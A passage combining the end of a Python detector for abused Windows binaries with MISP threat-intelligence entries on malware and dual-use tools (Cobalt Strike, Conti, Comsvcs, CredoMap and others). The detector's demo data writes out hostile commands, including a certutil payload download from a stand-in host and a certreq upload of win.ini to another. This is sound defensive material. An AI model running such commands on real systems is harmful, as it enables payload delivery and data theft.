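     lambda t, cl: {"/vpn", "/lan"} <= t),
    ("cmstp.exe", "INF-driven execution (/ni /s <inf>)",
     lambda t, cl: {"/ni", "/s"} <= t),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def scan(events) -> List[Finding]:
    """Return one Finding per (event, rule) match; events without a match produce nothing."""
    findings = []
    for ev in events:
        name = _basename(ev.image)
        cl = ev.cmdline.lower()
        tokens = set(cl.split())
        for binary, technique, pred in RULES:
            if name == binary and pred(tokens, cl):
                findings.append(Finding(binary, technique, ev))
    return findings


def demo_events():
    # Constructed records: eight abuse cases followed by three benign administrative uses.
    S32 = r"C:\Windows\System32"
    CDB = r"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe"
    cmd = S32 + r"\cmd.exe"
    return [
        ProcEvent(S32 + r"\certutil.exe", r"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.txt", cmd),
        ProcEvent(S32 + r"\certutil.exe", r"certutil.exe -decode C:\Users\Public\a.txt C:\Users\Public\a.exe", cmd),
        ProcEvent(S32 + r"\certreq.exe", r"certreq.exe -Post -config https://203.0.113.9/up C:\Windows\win.ini", cmd),
        ProcEvent(S32 + r"\certoc.exe", r"certoc.exe -LoadDLL C:\Users\Public\helper.dll", cmd),
        ProcEvent(S32 + r"\cmstp.exe", r"cmstp.exe /ni /s C:\Users\Public\profile.inf", cmd),
        ProcEvent(S32 + r"\cmdkey.exe", r"cmdkey.exe /list", cmd),
        ProcEvent(S32 + r"\cmdl32.exe", r"cmdl32.exe /vpn /lan C:\Users\Public\config", cmd),
        ProcEvent(CDB, r"cdb.exe -cf C:\Users\Public\run.wds notepad.exe", cmd),
        ProcEvent(S32 + r"\certutil.exe", r"certutil.exe -hashfile C:\Tools\setup.exe SHA256", cmd),
        ProcEvent(S32 + r"\certutil.exe", r"certutil.exe -urlcache", cmd),   # cache listing, no URL
        ProcEvent(CDB, r"cdb.exe -p 4120", cmd),                              # plain attach
    ]


if __name__ == "__main__":
    for f in scan(demo_events()):
        print(f"{f.binary:13} {f.technique:60} {f.event.cmdline}")
```

Command-line matching is only the first of the signals the entries list. The DLL-load and network-connection indicators for certoc.exe and cdb.exe, the CLR usage log (cmstp.exe.log) for Cmstp and the %TMP%\config.log artefact for cmdl32 come from image-load, network and file telemetry and need their own rules. A production version should also strip quotes from tokens and normalise the 8.3 and SysWOW64 forms of the image path before comparing.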
COATHANGER
COATHANGER is a remote access tool (RAT) targeting FortiGate networking appliances. First used in 2023 in targeted intrusions against military and government entities in the Netherlands along with other victims, COATHANGER was disclosed in early 2024, with a high confidence assessment linking this malware to a state-sponsored entity in the People's Republic of China. COATHANGER is delivered after gaining access to a FortiGate device, with in-the-wild observations linked to exploitation of CVE-2022-42475. The name COATHANGER is based on a unique string in the malware used to encrypt configuration files on disk: “She took his coat and hung it up”.[NCSC-NL COATHANGER Feb 2024]
Internal MISP references
UUID fbd3f71a-e123-5527-908c-9e7ea0d646e8
which can be used as unique global reference for COATHANGER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network', 'Linux'] |
software_attack_id | S1105 |
source | MITRE |
type | ['malware'] |
Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[cobaltstrike manual]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[cobaltstrike manual]
Internal MISP references
UUID 9b6bcbba-3ab4-4a4c-a233-cd12254823f6
which can be used as unique global reference for Cobalt Strike
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0154 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '56d89c06-23a0-4642-adfc-1fffd3524191', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '992bdd33-4a47-495d-883a-58010a2f0efb', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cobalt Strike Random C2 Profile Generator
This is an open-source tool for creating Cobalt Strike Malleable C2 profiles with randomly generated variables.[GitHub random_c2_profile] According to a September 2023 CERT-FR advisory, during an intrusion in March 2023, actors attributed to FIN12 used the tool to generate a Cobalt Strike malleable C2 profile.[CERTFR-2023-CTI-007]
Internal MISP references
UUID cf47b3ce-1392-4904-a4e6-f65aebebddc6
which can be used as unique global reference for Cobalt Strike Random C2 Profile Generator
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5057 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cobian RAT
Cobian RAT is a backdoor, remote access tool that has been observed since 2016.[Zscaler Cobian Aug 2017]
Internal MISP references
UUID d4e6f9f7-7f4d-47c2-be24-b267d9317303
which can be used as unique global reference for Cobian RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0338 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
code
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: VSCode binary, also portable (CLI) version
Author: PfiatDe
Paths: * %LOCALAPPDATA%\Programs\Microsoft VS Code\Code.exe * C:\Program Files\Microsoft VS Code\Code.exe * C:\Program Files (x86)\Microsoft VS Code\Code.exe
Resources: * https://badoption.eu/blog/2023/01/31/code_c2.html * https://code.visualstudio.com/docs/remote/tunnels * https://code.visualstudio.com/blogs/2022/12/07/remote-even-better
Detection: * IOC: Websocket traffic to global.rel.tunnels.api.visualstudio.com * IOC: Process tree: code.exe -> cmd.exe -> node.exe -> winpty-agent.exe * IOC: File write of code_tunnel.json, whose location is parameterizable but defaults to: %UserProfile%\.vscode-cli\code_tunnel.json[code.exe - LOLBAS Project]
Internal MISP references
UUID 49d440e4-b2ea-4e7d-8ded-8589ddf679d9
which can be used as unique global reference for code
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5185 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CoinTicker
CoinTicker is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.[CoinTicker 2019]
Internal MISP references
UUID b0d9b31a-072b-4744-8d2f-3a63256a932f
which can be used as unique global reference for CoinTicker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0369 |
source | MITRE |
type | ['malware'] |
Colorcpl
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary that handles color management
Author: Arjan Onwezen
Paths: * C:\Windows\System32\colorcpl.exe * C:\Windows\SysWOW64\colorcpl.exe
Resources: * https://twitter.com/eral4m/status/1480468728324231172
Detection: * Sigma: file_event_win_susp_colorcpl.yml * IOC: colorcpl.exe writing files[Colorcpl.exe - LOLBAS Project]
Internal MISP references
UUID 9f006b88-2f13-4c99-ade0-839da70d1e11
which can be used as unique global reference for Colorcpl
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5092 |
source | Tidal Cyber |
tags | ['884eb1b1-aede-4db0-8443-ba50624682e1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Comnie
Comnie is a remote backdoor which has been used in attacks in East Asia. [Palo Alto Comnie]
Internal MISP references
UUID 341fc709-4908-4e41-8df3-554dae6d72b0
which can be used as unique global reference for Comnie
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0244 |
source | MITRE |
type | ['malware'] |
ComRAT
ComRAT is a second stage implant suspected of being a descendant of Agent.btz and used by Turla. The first version of ComRAT was identified in 2007, but the tool has undergone substantial development for many years since.[Symantec Waterbug][NorthSec 2015 GData Uroburos Tools][ESET ComRAT May 2020]
Internal MISP references
UUID 300c5997-a486-4a61-8213-93a180c22849
which can be used as unique global reference for ComRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0126 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Comsvcs
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: COM+ Services
Author: LOLBAS Team
Paths: * c:\windows\system32\comsvcs.dll
Resources: * https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
Detection: * Sigma: proc_creation_win_rundll32_process_dump_via_comsvcs.yml * Sigma: proc_access_win_lsass_dump_comsvcs_dll.yml * Elastic: credential_access_cmdline_dump_tool.toml * Splunk: dump_lsass_via_comsvcs_dll.yml[Comsvcs.dll - LOLBAS Project]
Internal MISP references
UUID 0448178d-fff1-4174-8339-e6bfca78fb84
which can be used as unique global reference for Comsvcs
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5202 |
source | Tidal Cyber |
tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '334b0ee4-5a0d-4634-91c8-236593b818a0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Conficker
Conficker is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.[SANS Conficker] In 2016, a variant of Conficker made its way onto computers and removable disk drives belonging to a nuclear power plant.[Conficker Nuclear Power Plant]
Internal MISP references
UUID ef33f1fa-18a3-4b30-b359-17b7930f43a7
which can be used as unique global reference for Conficker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0608 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647'] |
type | ['malware'] |
ConfigSecurityPolicy
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary that is part of Windows Defender, used to manage Windows Defender settings. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author: Ialle Teixeira
Paths: * C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
Resources: * https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads * https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads * https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor * https://twitter.com/NtSetDefault/status/1302589153570365440?s=20
Detection: * Sigma: proc_creation_win_lolbin_configsecuritypolicy.yml * IOC: ConfigSecurityPolicy storing data into alternate data streams. * IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. * IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"[ConfigSecurityPolicy.exe - LOLBAS Project]
Internal MISP references
UUID 0e178275-4eb7-4fae-a703-d9730adf6a26
which can be used as unique global reference for ConfigSecurityPolicy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5093 |
source | Tidal Cyber |
tags | ['d99039e1-e677-4226-8b63-e698d6642535', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Conhost
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Console Window host
Author: Wietze Beukema
Paths: * c:\windows\system32\conhost.exe
Resources: * https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ * https://twitter.com/Wietze/status/1511397781159751680 * https://twitter.com/embee_research/status/1559410767564181504 * https://twitter.com/ankit_anubhav/status/1561683123816972288
Detection: * IOC: conhost.exe spawning unexpected processes * Sigma: proc_creation_win_conhost_susp_child_process.yml[Conhost.exe - LOLBAS Project]
Internal MISP references
UUID d3f8a214-3e65-4b7d-aed6-97a3e38ef8e0
which can be used as unique global reference for Conhost
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5094 |
source | Tidal Cyber |
tags | ['ea54037d-e07b-42b0-afe6-33576ec36f44', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ConnectWise
ConnectWise is a legitimate remote administration tool that has been used since at least 2016 by threat actors including MuddyWater and GOLD SOUTHFIELD to connect to and conduct lateral movement in target environments.[Anomali Static Kitten February 2021][Trend Micro Muddy Water March 2021]
Internal MISP references
UUID 6f9bb24d-cce2-49de-bedd-1849d9bde7a0
which can be used as unique global reference for ConnectWise
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0591 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Conti
Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using Conti steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.[Cybereason Conti Jan 2021][CarbonBlack Conti July 2020][Cybleinc Conti January 2020]
Internal MISP references
UUID 8e995c29-2759-4aeb-9a0f-bb7cd97b06e5
which can be used as unique global reference for Conti
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0575 |
source | MITRE |
tags | ['89c5b94b-ecf4-4d53-9b74-3465086d4565', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '0ed7d10c-c65b-4174-9edb-446bf301d250', '3d90eed2-862d-4f61-8c8f-0b8da3e45af0', '12a2e20a-7c27-46bb-954d-b372833a9925', '1b98f09a-7d93-4abb-8f3e-1eacdb9f9871', 'c2380542-36f2-4922-9ed2-80ced06645c9', 'dea4388a-b1f2-4f2a-9df9-108631d0d078', '24448a05-2337-4bc9-a889-a83f2fd1f3ad', '2743d495-7728-4a75-9e5f-b64854039792', 'd713747c-2d53-487e-9dac-259230f04460', 'fde4c246-7d2d-4d53-938b-44651cf273f1', '964c2590-4b52-48c6-afff-9a6d72e68908', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Control
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used to launch Control Panel items in Windows
Author: Oddvar Moe
Paths: * C:\Windows\System32\control.exe * C:\Windows\SysWOW64\control.exe
Resources: * https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ * https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ * https://twitter.com/bohops/status/955659561008017409 * https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items * https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
Detection: * Sigma: proc_creation_win_exploit_cve_2021_40444.yml * Sigma: proc_creation_win_rundll32_susp_control_dll_load.yml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * Elastic: defense_evasion_execution_control_panel_suspicious_args.toml * Elastic: defense_evasion_unusual_dir_ads.toml * IOC: Control.exe executing files from alternate data streams * IOC: Control.exe executing library file without cpl extension * IOC: Suspicious network connections from control.exe[Control.exe - LOLBAS Project]
Internal MISP references
UUID efc46430-b27f-4b05-bc36-1d5eba685ec7
which can be used as unique global reference for Control
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5095 |
source | Tidal Cyber |
tags | ['53ac2b35-d302-4bdd-9931-5b6c6cb31b96', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CookieMiner
CookieMiner is macOS-based malware that targets information associated with cryptocurrency exchanges and also enables cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.[Unit42 CookieMiner Jan 2019]
Internal MISP references
UUID 6e2c4aef-2f69-4507-9ee3-55432d76341e
which can be used as unique global reference for CookieMiner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0492 |
source | MITRE |
type | ['malware'] |
CORALDECK
CORALDECK is an exfiltration tool used by APT37. [FireEye APT37 Feb 2018]
Internal MISP references
UUID f13c8455-d615-4f8d-9d9c-5b31e593cd8a
which can be used as unique global reference for CORALDECK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0212 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
coregen
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads the exported function GetCLRRuntimeHost from coreclr.dll or from a .DLL in an arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.
Author: Martin Sohn Christensen
Paths: * C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe * C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
Resources: * https://www.youtube.com/watch?v=75XImxOOInU * https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Detection: * Sigma: image_load_side_load_coregen.yml * IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" * IOC: coregen.exe loading .dll file not named coreclr.dll * IOC: coregen.exe command line containing -L or -l * IOC: coregen.exe command line containing unexpected/invalid assembly name * IOC: coregen.exe application crash by invalid assembly name[coregen.exe - LOLBAS Project]
Internal MISP references
UUID b7dacd5c-eaba-48db-bdd7-e779a82b2ba7
which can be used as unique global reference for coregen
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5209 |
source | Tidal Cyber |
tags | ['a19a158e-aec4-410a-8c3e-e9080b111183', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CORESHELL
CORESHELL is a downloader used by APT28. The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.[FireEye APT28] [FireEye APT28 January 2017]
Internal MISP references
UUID 3b193f62-2b49-4eff-bdf4-501fb8a28274
which can be used as unique global reference for CORESHELL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0137 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CosmicDuke
CosmicDuke is malware that was used by APT29 from 2010 to 2015. [F-Secure The Dukes]
Internal MISP references
UUID 43b317c6-5b4f-47b8-b7b4-15cd6f455091
which can be used as unique global reference for CosmicDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0050 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CostaBricks
CostaBricks is a loader that was used to deploy 32-bit backdoors in the CostaRicto campaign.[BlackBerry CostaRicto November 2020]
Internal MISP references
UUID ea9e2d19-89fe-4039-a1e0-467b14554c6f
which can be used as unique global reference for CostaBricks
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0614 |
source | MITRE |
type | ['malware'] |
CozyCar
CozyCar is malware that was used by APT29 from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. [F-Secure The Dukes]
Internal MISP references
UUID c2353daa-fd4c-44e1-8013-55400439965a
which can be used as unique global reference for CozyCar
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0046 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CrackMapExec
CrackMapExec, or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks.[CME Github September 2018]
Internal MISP references
UUID 47e710b4-1397-47cf-a979-20891192f313
which can be used as unique global reference for CrackMapExec
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0488 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Createdump
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
Author: mr.d0x, Daniel Santos
Paths: * C:\Program Files\dotnet\shared\Microsoft.NETCore.App*\createdump.exe * C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App*\createdump.exe * C:\Program Files\Microsoft Visual Studio*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe * C:\Program Files (x86)\Microsoft Visual Studio*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
Resources: * https://twitter.com/bopin2020/status/1366400799199272960 * https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps
Detection: * Sigma: proc_creation_win_proc_dump_createdump.yml * Sigma: proc_creation_win_renamed_createdump.yml * IOC: createdump.exe process with a command line containing the lsass.exe process id[Createdump.exe - LOLBAS Project]
Internal MISP references
UUID a574b315-523c-45c3-8743-feb3d541e81a
which can be used as unique global reference for Createdump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5210 |
source | Tidal Cyber |
tags | ['7beee233-2b65-4593-88e6-a5c0c02c6a08', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CredoMap
CredoMap is a credential-stealing malware developed by the Russian espionage actor APT28. The malware harvests cookies and credentials from select web browsers and exfiltrates the information via the IMAP email protocol. CredoMap was observed being used in attack campaigns in Ukraine in 2022.[CERTFR-2023-CTI-009][SecurityScorecard CredoMap September 2022]
Internal MISP references
UUID 516ffd19-72b9-43a1-b866-bb075fdcb137
which can be used as unique global reference for CredoMap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5074 |
source | Tidal Cyber |
tags | ['904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CreepyDrive
CreepyDrive is a custom implant that has been used by POLONIUM since at least early 2022 for C2 with, and exfiltration to, actor-controlled OneDrive accounts.[Microsoft POLONIUM June 2022]
POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.[Microsoft POLONIUM June 2022]
Internal MISP references
UUID 7f7f05c3-fbb1-475e-b672-2113709065c8
which can be used as unique global reference for CreepyDrive
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Office 365', 'Windows'] |
software_attack_id | S1023 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CreepySnail
CreepySnail is a custom PowerShell implant that has been used by POLONIUM since at least 2022.[Microsoft POLONIUM June 2022]
Internal MISP references
UUID 11ce380c-481b-4c9b-b44e-06f1a91c01c1
which can be used as unique global reference for CreepySnail
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1024 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Crimson
Crimson is a remote access Trojan that has been used by Transparent Tribe since at least 2016.[Proofpoint Operation Transparent Tribe March 2016][Kaspersky Transparent Tribe August 2020]
Internal MISP references
UUID 3b3f296f-20a6-459a-98c5-62ebdee3701f
which can be used as unique global reference for Crimson
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0115 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CrossRAT
CrossRAT is a cross-platform RAT.
Internal MISP references
UUID 38811c3b-f548-43fa-ab26-c7243b84a055
which can be used as unique global reference for CrossRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0235 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Crutch
Crutch is a backdoor designed for document theft that has been used by Turla since at least 2015.[ESET Crutch December 2020]
Internal MISP references
UUID e1ad229b-d750-4148-a1f3-36e767b03cd1
which can be used as unique global reference for Crutch
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0538 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cryptoistic
Cryptoistic is a backdoor, written in Swift, that has been used by Lazarus Group.[SentinelOne Lazarus macOS July 2020]
Internal MISP references
UUID 12ce6d04-ebe5-440e-b342-0283b7c8a0c8
which can be used as unique global reference for Cryptoistic
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0498 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Csc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary file used by .NET to compile C# code
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
